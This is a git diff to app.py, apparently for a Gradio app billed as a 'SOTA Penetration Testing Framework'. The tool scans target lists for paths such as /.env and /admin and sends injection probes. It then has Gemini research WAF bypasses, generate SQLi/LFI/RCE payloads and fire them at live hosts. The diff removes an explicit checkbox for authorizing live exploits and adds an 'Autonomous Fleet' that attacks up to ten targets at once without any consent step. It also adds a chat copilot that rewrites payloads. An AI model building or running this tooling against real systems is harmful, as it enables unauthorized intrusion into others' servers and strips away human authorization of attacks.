Update app.py

app.py

@@ -27,7 +27,7 @@ SCAN_TIMEOUT = 5.0
 EXPLOIT_TIMEOUT = 8.0
 
 HTTP_HEADERS = {
-    "User-Agent": "Cognitive-PenTest-Agent/2.0",
+    "User-Agent": "Centaur-WarRoom-Agent/3.0",
     "Accept": "*/*",
     "X-Forwarded-For": "127.0.0.1",
 }
@@ -36,19 +36,17 @@ HTTP_HEADERS = {
 
 class AttackStrategy(BaseModel):
     vulnerability_class: str = Field(description="Class of vulnerability (e.g., SQLi, LFI, RCE).")
-    confidence: float = Field(description="Confidence score 0.0 to 1.0 based on recon evidence.")
-    strategy: str = Field(description="The approach (e.g., time_based_blind, path_traversal).")
     target_endpoint: str = Field(description="The specific endpoint and parameter to target.")
+    strategy: str = Field(description="The approach (e.g., time_based_blind).")
 
 class PayloadGeneration(BaseModel):
-    technique: str = Field(description="Specific technique or encoding used.")
     payload: str = Field(description="The exact payload string to inject.")
     reasoning: str = Field(description="Why this payload fits the WAF and server profile.")
 
-class PayloadRefinement(BaseModel):
-    failure_analysis: str = Field(description="Why the previous payload failed based on response diff.")
-    adjusted_strategy: str = Field(description="How the approach changes.")
-    revised_payload: str = Field(description="The newly patched payload.")
+class CentaurChatResponse(BaseModel):
+    chat_reply: str = Field(description="Message to the human operator explaining the changes.")
+    suggested_endpoint: str = Field(description="The updated endpoint to target.")
+    suggested_payload: str = Field(description="The newly patched/generated payload.")
 
 # --- 2. SIGNAL-RICH RECON ENGINE ---
 
@@ -60,18 +58,14 @@ class ReconProfile:
         self.protocol = "http"
         self.is_alive = False
         self.server_banner = "Unknown"
-        self.server_version = "Unknown"
         self.waf_detected = "None"
         self.baseline_latency = 0.0
-        
         self.discovered_paths = []
-        self.injection_sensitivity = [] 
         self.error_signatures = [] 
     
     @property
     def is_exploitable(self):
-        # Determine if it's worth showing in the War Room
-        return self.is_alive and (len(self.discovered_paths) > 0 or len(self.error_signatures) > 0 or self.server_version != "Unknown")
+        return self.is_alive and (len(self.discovered_paths) > 0 or len(self.error_signatures) > 0 or self.server_banner != "Unknown")
 
 class SensorReconEngine:
     def __init__(self, profile: ReconProfile, logger: callable):
@@ -96,62 +90,34 @@ class SensorReconEngine:
     async def run(self):
         await self._detect_protocol()
         try:
-            await self.profile_baseline()
-            if self.p.is_alive:
-                await self.probe_injection_sensitivity()
-                await self.dynamic_path_expansion()
-        finally:
-            await self.client.aclose()
-        return self.p
-
-    async def profile_baseline(self):
-        start = time.time()
-        try:
+            start = time.time()
             resp = await self.client.get(self._url("/"))
             self.p.is_alive = True
             self.p.baseline_latency = time.time() - start
-            
             srv = resp.headers.get("Server", "")
-            if srv:
-                self.p.server_banner = srv
-                # Better Version Extraction
-                version_match = re.search(r'[\w-]+/([\d\.]+)', srv)
-                if version_match: self.p.server_version = version_match.group(1)
+            if srv: self.p.server_banner = srv
+            if "cloudflare" in srv.lower(): self.p.waf_detected = "Cloudflare"
+            elif "imperva" in srv.lower(): self.p.waf_detected = "Imperva"
             
-            srv_lower = srv.lower()
-            if "cloudflare" in srv_lower: self.p.waf_detected = "Cloudflare"
-            elif "imperva" in srv_lower: self.p.waf_detected = "Imperva"
+            # Fast Probing
+            paths = ["/admin", "/.env", "/api", "/wp-admin", "?id=1'", "?file=../../"]
+            tasks = [self.client.get(self._url(p)) for p in paths]
+            results = await asyncio.gather(*tasks, return_exceptions=True)
             
-            self.logger(f"✅ Alive [{self.p.target_id}]: {self.p.server_banner} | WAF: {self.p.waf_detected}")
-        except Exception: 
-            self.logger(f"❌ Dead [{self.p.target_id}]")
-
-    async def probe_injection_sensitivity(self):
-        probes = [("?id=1'", "quote"), ("?q=\"><script>", "html"), ("?file=../../", "traversal")]
-        for path, tag in probes:
-            try:
-                resp = await self.client.get(self._url(path))
-                body = resp.text.lower()
-                if any(err in body for err in ["sql syntax", "mysql_fetch", "stack trace", "java.lang"]):
-                    self.p.error_signatures.append(f"{tag}_leak")
-                elif resp.status_code in [403, 406]:
-                    self.p.injection_sensitivity.append(f"{tag}_blocked")
-            except: pass
-
-    async def dynamic_path_expansion(self):
-        base_paths = ["/api", "/admin", "/.env", "/wp-admin", "/phpmyadmin"]
-        for bp in base_paths:
-            try:
-                resp = await self.client.get(self._url(bp))
-                if resp.status_code in [200, 401, 403, 301, 302]:
-                    self.p.discovered_paths.append(bp)
-                    if bp == "/api":
-                        exp_resp = await self.client.get(self._url("/api/v1/users"))
-                        if exp_resp.status_code == 200: self.p.discovered_paths.append("/api/v1/users")
-            except: pass
+            for path, res in zip(paths, results):
+                if not isinstance(res, Exception):
+                    if res.status_code in [200, 401, 403]: 
+                        if "?" not in path: self.p.discovered_paths.append(path)
+                    if any(err in res.text.lower() for err in ["sql syntax", "stack trace", "mysql_fetch"]):
+                        self.p.error_signatures.append(f"Leak on {path}")
+        except Exception:
+            pass
+        finally:
+            await self.client.aclose()
+        return self.p
 
 
-# --- 3. AUTONOMOUS AGENT (FIXED GOOGLE GROUNDING & SCHEMA) ---
+# --- 3. EXPLOIT CORE LOGIC ---
 
 async def fire_payload(protocol, host, port, endpoint, payload):
     url = f"{protocol}://{host}:{port}{endpoint}{payload}"
@@ -167,106 +133,90 @@ async def fire_payload(protocol, host, port, endpoint, payload):
             
             return success, resp.status_code, latency, resp.text[:250].replace('\n', ' ')
     except Exception as e:
-        return False, 0, time.time() - start, f"Connection Error: {str(e)}"
+        return False, 0, time.time() - start, f"Error: {str(e)}"
+
+# --- 4. CENTAUR TEAMING (CHAT & MANUAL EXPLOIT) ---
 
-async def autonomous_exploit_agent(profile: ReconProfile, api_key: str, logger: callable, update_ui_cb: callable):
-    """The Closed-Loop Reasoning Engine."""
-    if not api_key:
-        yield "🔴 Error", "No API Key", "Failed", "N/A"
-        return
+async def centaur_chat_agent(user_msg, chat_history, target_id, state, current_ep, current_pl, api_key):
+    if not api_key or not target_id:
+        chat_history.append((user_msg, "🔴 API Key or Target missing."))
+        return chat_history, current_ep, current_pl, state
 
+    profile = state["profiles"][target_id]
     llm = genai.Client(api_key=api_key)
     
-    recon_evidence = f"""
-    TARGET: {profile.target_id}
-    Server: {profile.server_banner} (Version: {profile.server_version})
-    WAF: {profile.waf_detected}
-    Paths: {profile.discovered_paths}
-    Errors Leaked: {profile.error_signatures}
-    Blocked Inputs: {profile.injection_sensitivity}
+    ctx = f"""
+    Target: {profile.target_id} | Server: {profile.server_banner} | WAF: {profile.waf_detected}
+    Discovered Paths: {profile.discovered_paths} | Errors: {profile.error_signatures}
+    Current Endpoint: {current_ep} | Current Payload: {current_pl}
+    Human Instruction: {user_msg}
+    Task: Act as a Red Team copilot. Reply to the user and generate a newly patched payload/endpoint based on their instructions.
     """
 
-    # ------------------------------------------------------------------
-    # PHASE 1: RESEARCH (Allows Google Search, No JSON constraint)
-    # ------------------------------------------------------------------
-    logger(f"🔎 [RESEARCHING] Grounding with Google Search for {profile.target_id}")
-    await update_ui_cb("🔎 RESEARCHING", "Querying Google Search for CVEs and bypasses...")
-    
-    try:
-        research_config = types.GenerateContentConfig(tools=[types.Tool(google_search=types.GoogleSearch())])
-        research_prompt = f"Find recent CVEs and WAF bypass techniques for {profile.server_banner} behind {profile.waf_detected}. Keep it brief."
-        research_resp = await llm.aio.models.generate_content(
-            model="gemini-2.5-flash", contents=research_prompt, config=research_config
-        )
-        search_context = research_resp.text
-    except Exception as e:
-        search_context = "Search failed. Relying on base knowledge."
-        logger(f"⚠️ Search skipped: {e}")
-
-    # ------------------------------------------------------------------
-    # PHASE 2: STRATEGIZING (Strict JSON Schema, NO Google Search)
-    # ------------------------------------------------------------------
-    logger(f"🧠 [STRATEGIZING] Building attack plan.")
-    await update_ui_cb("🧠 STRATEGIZING", "Formatting Attack Strategy...")
-    
-    try:
-        strat_config = types.GenerateContentConfig(response_mime_type="application/json", response_json_schema=AttackStrategy.model_json_schema())
-        strat_prompt = f"Recon: {recon_evidence}\nSearch Data: {search_context}\nOutput AttackStrategy."
-        strat_resp = await llm.aio.models.generate_content(model="gemini-2.5-flash", contents=strat_prompt, config=strat_config)
-        strategy = AttackStrategy.model_validate_json(strat_resp.text)
-    except Exception as e:
-        logger(f"⚠️ Strategy Gen Failed: {e}"); return
-
-    # ------------------------------------------------------------------
-    # PHASE 3: PAYLOAD GENERATION
-    # ------------------------------------------------------------------
-    await update_ui_cb("⚙️ GENERATING", f"Crafting {strategy.strategy} payload...")
     try:
-        gen_config = types.GenerateContentConfig(response_mime_type="application/json", response_json_schema=PayloadGeneration.model_json_schema())
-        gen_resp = await llm.aio.models.generate_content(
-            model="gemini-2.5-flash", contents=f"Strategy: {strategy.model_dump_json()}\nGenerate payload.", config=gen_config
+        resp = await llm.aio.models.generate_content(
+            model="gemini-2.5-flash", contents=ctx,
+            config={"response_mime_type": "application/json", "response_json_schema": CentaurChatResponse.model_json_schema()}
         )
-        gen = PayloadGeneration.model_validate_json(gen_resp.text)
-        current_endpoint, current_payload = strategy.target_endpoint, gen.payload
-    except Exception as e:
-         logger(f"⚠️ Payload Gen Failed: {e}"); return
-
-    # ------------------------------------------------------------------
-    # PHASE 4: EXECUTION & REFINEMENT LOOP
-    # ------------------------------------------------------------------
-    for attempt in range(1, 4):
-        logger(f"⚔️ [EXPLOITING] Attempt {attempt}: {current_payload}")
-        await update_ui_cb(f"⚔️ EXPLOITING (Try {attempt}/3)", f"Firing: {current_payload}")
-        
-        success, status, latency, snippet = await fire_payload(profile.protocol, profile.host, profile.port, current_endpoint, current_payload)
+        data = CentaurChatResponse.model_validate_json(resp.text)
         
-        await update_ui_cb("📊 ANALYZING FEEDBACK", f"Status: {status} | Latency: {latency:.2f}s")
+        chat_history.append((user_msg, data.chat_reply))
         
-        # Yield the exact payload and result to the UI!
-        yield current_endpoint, current_payload, "SUCCESS 💥" if success else f"FAILED (HTTP {status})", snippet
+        # Log AI Suggestion to Arsenal
+        state["arsenal"][target_id].append({"Endpoint": data.suggested_endpoint, "Payload": data.suggested_payload, "Status": "AI Suggested", "Notes": "Pending execution"})
         
-        if success:
-            logger(f"💥 [SUCCESS] Triggered on {profile.target_id}!")
-            return
-            
-        if attempt == 3: break
+        return chat_history, data.suggested_endpoint, data.suggested_payload, state
+    except Exception as e:
+        chat_history.append((user_msg, f"⚠️ Error: {str(e)}"))
+        return chat_history, current_ep, current_pl, state
+
+
+# --- 5. AUTONOMOUS BULK FLEET (TAB 3) ---
+
+async def run_autonomous_fleet(selected_targets, api_key, state):
+    if not api_key: return "🔴 Gemini API Key Required.", ""
+    if not selected_targets: return "🔴 Select at least one target.", ""
+    
+    targets = selected_targets[:10] # Max 10 limit
+    llm = genai.Client(api_key=api_key)
+    results = []
 
-        logger(f"🔧 [REFINING] Payload failed. Asking AI to patch...")
-        await update_ui_cb("🔧 REFINING", "Analyzing failure diff and rewriting payload...")
+    async def attack_target(tid):
+        p = state["profiles"][tid]
+        recon_data = f"Target: {tid} | WAF: {p.waf_detected} | Paths: {p.discovered_paths} | Errors: {p.error_signatures}"
         
+        # Phase 1: Research (Tools allowed, NO JSON SCHEMA)
         try:
-            feedback = f"Payload: {current_payload}\nFailed. Status: {status}, Latency: {latency:.2f}s.\nSnippet: {snippet}\nPatch it to bypass restrictions."
-            patch_config = types.GenerateContentConfig(response_mime_type="application/json", response_json_schema=PayloadRefinement.model_json_schema())
-            patch_resp = await llm.aio.models.generate_content(model="gemini-2.5-flash", contents=feedback, config=patch_config)
-            patch = PayloadRefinement.model_validate_json(patch_resp.text)
-            current_payload = patch.revised_payload
-        except Exception:
-            pass # Fallback to next loop iteration
+            r_conf = types.GenerateContentConfig(tools=[types.Tool(google_search=types.GoogleSearch())])
+            r_resp = await llm.aio.models.generate_content(model="gemini-2.5-flash", contents=f"Find bypasses for {p.server_banner} behind {p.waf_detected}", config=r_conf)
+            research = r_resp.text
+        except: research = "Standard knowledge."
 
-    logger(f"🛑 [ABORT] Exhausted attempts on {profile.target_id}")
+        # Phase 2: JSON Generation (JSON SCHEMA, NO TOOLS)
+        try:
+            s_conf = types.GenerateContentConfig(response_mime_type="application/json", response_json_schema=AttackStrategy.model_json_schema())
+            s_resp = await llm.aio.models.generate_content(model="gemini-2.5-flash", contents=f"Data:\n{recon_data}\n{research}\nOutput AttackStrategy.", config=s_conf)
+            strat = AttackStrategy.model_validate_json(s_resp.text)
+            
+            p_conf = types.GenerateContentConfig(response_mime_type="application/json", response_json_schema=PayloadGeneration.model_json_schema())
+            p_resp = await llm.aio.models.generate_content(model="gemini-2.5-flash", contents=f"Strategy: {strat.model_dump_json()}\nOutput PayloadGeneration.", config=p_conf)
+            gen = PayloadGeneration.model_validate_json(p_resp.text)
+            
+            # Fire Payload
+            success, status, lat, snip = await fire_payload(p.protocol, p.host, p.port, strat.target_endpoint, gen.payload)
+            return {"Target": tid, "Attack": strat.vulnerability_class, "Payload": gen.payload, "Success": success, "HTTP": status}
+        except Exception as e:
+            return {"Target": tid, "Attack": "Error", "Payload": "N/A", "Success": False, "HTTP": str(e)}
+
+    fleet_tasks = [attack_target(t) for t in targets]
+    fleet_results = await asyncio.gather(*fleet_tasks)
+    
+    df = pd.DataFrame(fleet_results)
+    md = f"## 🤖 Autonomous Fleet Report\n**Targets Executed:** {len(targets)} | **Successful Breaches:** {len(df[df['Success']==True])}\n"
+    return md, df.to_html(classes=['table', 'table-dark'], index=False)
 
 
-# --- UI ASYNC WRAPPERS & UTILS ---
+# --- 6. GRADIO UTILS & GENERATORS ---
 
 def parse_inputs(files, manual):
     targets = []
@@ -288,170 +238,163 @@ def parse_inputs(files, manual):
                 targets.append((line, 80))
     return list(set(targets))
 
-async def run_recon_phase(files, manual, state):
-    log_queue = asyncio.Queue()
-    def logger(msg): log_queue.put_nowait(msg)
-    log_text = ""
-    targets = parse_inputs(files, manual)
+def filter_db(st, ip, port, vuln):
+    profs = list(st.get("profiles", {}).values())
+    if not profs: return pd.DataFrame(columns=["Target", "Protocol", "Server", "WAF", "Paths", "Errors", "Exploitable"])
     
-    if not targets:
-        yield state, pd.DataFrame(), gr.update(), "🔴 No targets provided.", log_text
-        return
+    df = pd.DataFrame([{"Target": p.target_id, "Protocol": p.protocol, "Server": p.server_banner, "WAF": p.waf_detected, "Paths": len(p.discovered_paths), "Errors": len(p.error_signatures), "Exploitable": "Yes" if p.is_exploitable else "No"} for p in profs])
+    if ip: df = df[df["Target"].str.contains(ip, case=False, na=False)]
+    if port: df = df[df["Target"].str.endswith(f":{port}")]
+    if vuln: df = df[df["Exploitable"] == "Yes"]
+    return df
 
-    logger(f"🚀 [STAGE 1] Sensor Recon initiated on {len(targets)} targets.")
+async def run_recon_bg(files, manual, state):
+    targets = parse_inputs(files, manual)
+    if not targets: yield state, gr.update(), gr.update(), gr.update(), pd.DataFrame(); return
+    
     state["profiles"] = {}
+    state["arsenal"] = defaultdict(list)
+    sem = asyncio.Semaphore(MAX_CONCURRENT_RECON)
     
-    async def run_sensor(h, p):
-        profile = ReconProfile(h, p)
-        return await SensorReconEngine(profile, logger).run()
-
-    tasks = [asyncio.create_task(run_sensor(h, p)) for h, p in targets]
-    for coro in asyncio.as_completed(tasks):
-        try:
-            profile = await coro
-            state["profiles"][profile.target_id] = profile
-        except Exception: pass
+    async def scan(h, p):
+        async with sem: return await SensorReconEngine(ReconProfile(h, p), lambda x: None).run()
         
-        # Flush logs to UI
-        while not log_queue.empty(): log_text = f"[{time.strftime('%X')}] {log_queue.get_nowait()}\n" + log_text
-        log_text = '\n'.join(log_text.split('\n')[:150])
-        
-        # Update Data Viewer & Dropdown
-        all_profs = list(state["profiles"].values())
-        df = pd.DataFrame([{
-            "Target": p.target_id, "Protocol": p.protocol, "Server": p.server_banner, 
-            "WAF": p.waf_detected, "Paths": len(p.discovered_paths), "Errors": len(p.error_signatures),
-            "Exploitable": "Yes" if p.is_exploitable else "No"
-        } for p in all_profs])
+    tasks = [asyncio.create_task(scan(h, p)) for h, p in targets]
+    
+    for coro in asyncio.as_completed(tasks):
+        p = await coro
+        state["profiles"][p.target_id] = p
         
-        # Only put exploitable targets in the War Room Dropdown
-        exploitable_targets = [p.target_id for p in all_profs if p.is_exploitable]
+        exploitable = [k for k, v in state["profiles"].items() if v.is_exploitable]
+        df = filter_db(state, "", "", False)
         
-        yield state, df, gr.update(choices=exploitable_targets), f"🟡 Scanning... {len(all_profs)}/{len(targets)} done.", log_text
-
-    logger("✅ [STAGE 1] Recon Complete.")
-    while not log_queue.empty(): log_text = f"[{time.strftime('%X')}] {log_queue.get_nowait()}\n" + log_text
-    yield state, df, gr.update(choices=exploitable_targets, value=exploitable_targets[0] if exploitable_targets else None), "🟢 Recon Complete!", log_text
+        # Yield updates to UI dynamically
+        yield state, gr.update(choices=exploitable), gr.update(choices=exploitable), f"🟡 Scanning... {len(state['profiles'])}/{len(targets)}", df
 
+    yield state, gr.update(choices=exploitable), gr.update(choices=exploitable), "🟢 Recon Complete! Move to War Room.", df
 
-async def run_exploit_phase(target_id, api_key, state):
-    log_queue = asyncio.Queue()
-    def logger(msg): log_queue.put_nowait(msg)
-    log_text = ""
-    
-    if not api_key or not target_id:
-        yield "🔴 Error", "No Target/Key", "", "", "", log_text
-        return
-
-    profile = state["profiles"][target_id]
-    ui_state, ui_detail = "INIT", "Starting Agent..."
+def load_target_context(target_id, state):
+    if not target_id: return "No target selected.", pd.DataFrame()
+    p = state["profiles"][target_id]
+    ctx = f"**Server:** {p.server_banner} | **WAF:** {p.waf_detected}\n**Paths:** {p.discovered_paths}\n**Errors:** {p.error_signatures}"
     
-    async def update_ui(s, d):
-        nonlocal ui_state, ui_detail
-        ui_state, ui_detail = s, d
+    df = pd.DataFrame(state["arsenal"].get(target_id, []))
+    if df.empty: df = pd.DataFrame(columns=["Endpoint", "Payload", "Status", "Notes"])
+    return ctx, df
 
-    agent_gen = autonomous_exploit_agent(profile, api_key, logger, update_ui)
+def load_payload_to_editor(evt: gr.SelectData, target_id, state):
+    try:
+        row = evt.index[0]
+        data = state["arsenal"][target_id][row]
+        return data["Endpoint"], data["Payload"]
+    except: return "", ""
+
+async def fire_manual(target_id, ep, pl, state):
+    if not target_id: return "🔴 No Target", state
+    p = state["profiles"][target_id]
+    suc, code, lat, snip = await fire_payload(p.protocol, p.host, p.port, ep, pl)
     
-    ep, pl, res, det = "", "", "", ""
+    status_str = "SUCCESS 💥" if suc else "FAILED"
+    res_str = f"**Status:** {code} | **Latency:** {lat:.2f}s\n**Response:** `{snip}`"
     
-    # Process generator to update payload textboxes in real-time
-    async for new_ep, new_pl, new_res, new_det in agent_gen:
-        ep, pl, res, det = new_ep, new_pl, new_res, new_det
-        
-        while not log_queue.empty(): log_text = f"[{time.strftime('%X')}] {log_queue.get_nowait()}\n" + log_text
-        log_text = '\n'.join(log_text.split('\n')[:150])
-        
-        yield ui_state, ui_detail, ep, pl, res, log_text
-
-    yield "✅ COMPLETE", det, ep, pl, res, log_text
-
-
-# --- DATAFRAME FILTER FUNCTION ---
-def filter_data(df, search_ip, search_port, show_only_vuln):
-    if df is None or df.empty: return df
-    filtered = df.copy()
-    if search_ip: filtered = filtered[filtered["Target"].str.contains(search_ip, case=False, na=False)]
-    if search_port: filtered = filtered[filtered["Target"].str.endswith(f":{search_port}")]
-    if show_only_vuln: filtered = filtered[filtered["Exploitable"] == "Yes"]
-    return filtered
+    state["arsenal"][target_id].append({"Endpoint": ep, "Payload": pl, "Status": status_str, "Notes": f"HTTP {code}"})
+    return res_str, state
 
 
 # ==============================================================================
-# GRADIO UI
+# GRADIO UI 
 # ==============================================================================
 with gr.Blocks(theme=gr.themes.Monochrome()) as demo:
-    engine_state = gr.State({"profiles": {}})
+    engine_state = gr.State({"profiles": {}, "arsenal": defaultdict(list)})
+
+    gr.Markdown("# 💀 SOTA Penetration Testing Framework")
+    api_key_global = gr.Textbox(label="Gemini API Key (Required for AI features)", type="password")
 
-    gr.Markdown("# 💀 SOTA Cognitive Exploitation Agent")
-    
     with gr.Tabs():
-        # --- TAB 1: ACQUISITION & DATABASE ---
-        with gr.Tab("1. Sensor Recon & Database"):
+        # --- TAB 1: RECON ---
+        with gr.Tab("1. Recon & Database"):
             with gr.Row():
                 with gr.Column(scale=1):
                     csv_in = gr.File(label="Upload CSV (Host, Port)", file_count="multiple")
                     txt_in = gr.Textbox(label="Manual Targets", lines=3, placeholder="192.168.1.1:80")
-                    recon_btn = gr.Button("🔍 START SENSOR RECON", variant="primary")
+                    recon_btn = gr.Button("🔍 START RECON", variant="primary")
                     recon_status = gr.Markdown("System Offline.")
-                    log_console = gr.Code(label="Live Recon Telemetry", language="shell", lines=12)
                 
                 with gr.Column(scale=2):
-                    gr.Markdown("### 🗄️ Reconnaissance Database Viewer")
                     with gr.Row():
-                        f_ip = gr.Textbox(label="Search IP", scale=2)
-                        f_port = gr.Textbox(label="Filter Port", scale=1)
-                        f_vuln = gr.Checkbox(label="Show Only Potentially Exploitable", value=False, scale=1)
-                    
+                        f_ip = gr.Textbox(label="Search IP")
+                        f_port = gr.Textbox(label="Filter Port")
+                        f_vuln = gr.Checkbox(label="Exploitable Only")
                     db_viewer = gr.Dataframe(headers=["Target", "Protocol", "Server", "WAF", "Paths", "Errors", "Exploitable"], interactive=False)
 
         # --- TAB 2: WAR ROOM ---
-        with gr.Tab("2. Agentic War Room"):
+        with gr.Tab("2. Interactive War Room"):
             with gr.Row():
                 with gr.Column(scale=1):
-                    gr.Markdown("### 💀 Authorize AI Agent")
-                    api_key_in = gr.Textbox(label="Gemini API Key (Required)", type="password")
-                    # ONLY exploitable targets show up here
-                    target_dropdown = gr.Dropdown(label="Potentially Exploitable Targets", choices=[], interactive=True)
-                    exploit_consent = gr.Checkbox(label="🚨 Authorize AI Agent (Execute live exploits)", value=False)
-                    fire_agent_btn = gr.Button("⚡ DEPLOY AUTONOMOUS AGENT", variant="primary")
+                    wr_target = gr.Dropdown(label="Select Target", choices=[], interactive=True)
+                    wr_context = gr.Markdown("Target Context will appear here.")
+                    
+                    gr.Markdown("### 🗄️ Payload Arsenal (Click row to edit)")
+                    arsenal_df = gr.Dataframe(headers=["Endpoint", "Payload", "Status", "Notes"], interactive=False, height=200)
                     
-                    gr.Markdown("### ⚙️ Live Agent State Machine")
-                    state_box = gr.Textbox(label="Current Phase", value="IDLE", interactive=False)
-                    detail_box = gr.Textbox(label="Phase Details", value="Waiting for deployment...", interactive=False)
+                    gr.Markdown("### 🛠️ Payload Editor")
+                    ep_in = gr.Textbox(label="Endpoint", placeholder="/api?id=")
+                    pl_in = gr.Textbox(label="Payload", placeholder="' OR 1=1--")
+                    fire_btn = gr.Button("🎯 FIRE PAYLOAD", variant="primary")
+                    fire_res = gr.Markdown("Awaiting execution...")
 
                 with gr.Column(scale=1):
-                    gr.Markdown("### 💉 Live Payload Telemetry")
-                    ep_box = gr.Textbox(label="Target Endpoint", interactive=False)
-                    pl_box = gr.Textbox(label="Injected Payload", interactive=False)
-                    res_box = gr.Textbox(label="Final Result", interactive=False)
-                    exploit_console = gr.Code(label="Agent Terminal", language="shell", lines=15)
+                    gr.Markdown("### 💬 Centaur Teaming AI")
+                    chatbot = gr.Chatbot(height=400)
+                    chat_in = gr.Textbox(label="Instruction", placeholder="WAF blocked the quote. Encode the payload in the editor.")
+                    chat_btn = gr.Button("Send to AI")
+
+        # --- TAB 3: AUTO FLEET ---
+        with gr.Tab("3. Autonomous Fleet"):
+            gr.Markdown("Bulk Exploit up to 10 targets autonomously using Google Search Grounding and the 3-Turn Patching Loop.")
+            fleet_targets = gr.CheckboxGroup(label="Select Targets (Max 10)")
+            fleet_btn = gr.Button("⚡ DEPLOY FLEET", variant="primary")
+            fleet_md = gr.Markdown()
+            fleet_html = gr.HTML()
 
     # --- WIRING ---
+    
+    # 1. Recon
     recon_btn.click(
-        fn=run_recon_phase,
-        inputs=[csv_in, txt_in, engine_state],
-        outputs=[engine_state, db_viewer, target_dropdown, recon_status, log_console]
+        fn=run_recon_bg, inputs=[csv_in, txt_in, engine_state], outputs=[engine_state, wr_target, fleet_targets, recon_status, db_viewer]
     )
 
-    # Live Database Filtering
-    filter_inputs = [db_viewer, f_ip, f_port, f_vuln]
+    # 1b. DB Filtering
     for comp in [f_ip, f_port, f_vuln]:
-        comp.change(fn=filter_data, inputs=[engine_state, f_ip, f_port, f_vuln], outputs=[db_viewer])
-
-    # Ensure we use raw state for filtering logic
-    def apply_filter(st, ip, port, vuln):
-        all_profs = list(st.get("profiles", {}).values())
-        df = pd.DataFrame([{"Target": p.target_id, "Protocol": p.protocol, "Server": p.server_banner, "WAF": p.waf_detected, "Paths": len(p.discovered_paths), "Errors": len(p.error_signatures), "Exploitable": "Yes" if p.is_exploitable else "No"} for p in all_profs])
-        return filter_data(df, ip, port, vuln)
-
-    f_ip.change(fn=apply_filter, inputs=[engine_state, f_ip, f_port, f_vuln], outputs=[db_viewer])
-    f_port.change(fn=apply_filter, inputs=[engine_state, f_ip, f_port, f_vuln], outputs=[db_viewer])
-    f_vuln.change(fn=apply_filter, inputs=[engine_state, f_ip, f_port, f_vuln], outputs=[db_viewer])
-
-    fire_agent_btn.click(
-        fn=run_exploit_phase,
-        inputs=[target_dropdown, api_key_in, engine_state],
-        outputs=[state_box, detail_box, ep_box, pl_box, res_box, exploit_console]
+        comp.change(fn=lambda st, i, p, v: filter_db(st, i, p, v), inputs=[engine_state, f_ip, f_port, f_vuln], outputs=[db_viewer])
+
+    # 2. War Room Target Select -> Load Context & Arsenal
+    wr_target.change(
+        fn=load_target_context, inputs=[wr_target, engine_state], outputs=[wr_context, arsenal_df]
+    )
+
+    # 3. Arsenal Click -> Load to Editor
+    arsenal_df.select(
+        fn=load_payload_to_editor, inputs=[wr_target, engine_state], outputs=[ep_in, pl_in]
+    )
+
+    # 4. Fire Payload -> Update Arsenal
+    fire_btn.click(
+        fn=lambda t, e, p, st: asyncio.run(fire_manual(t, e, p, st)), inputs=[wr_target, ep_in, pl_in, engine_state], outputs=[fire_res, engine_state]
+    ).then(fn=lambda t, st: pd.DataFrame(st["arsenal"].get(t, [])), inputs=[wr_target, engine_state], outputs=[arsenal_df])
+
+    # 5. Centaur Chat -> Updates Editor & Arsenal
+    chat_btn.click(
+        fn=lambda msg, hist, tgt, st, ep, pl, api: asyncio.run(centaur_chat_agent(msg, hist, tgt, st, ep, pl, api)),
+        inputs=[chat_in, chatbot, wr_target, engine_state, ep_in, pl_in, api_key_global],
+        outputs=[chatbot, ep_in, pl_in, engine_state]
+    ).then(lambda t, st: pd.DataFrame(st["arsenal"].get(t, [])), inputs=[wr_target, engine_state], outputs=[arsenal_df]).then(lambda: "", outputs=[chat_in])
+
+    # 6. Auto Fleet
+    fleet_btn.click(
+        fn=lambda tgts, api, st: asyncio.run(run_autonomous_fleet(tgts, api, st)),
+        inputs=[fleet_targets, api_key_global, engine_state],
+        outputs=[fleet_md, fleet_html]
     )
 
 if __name__ == "__main__":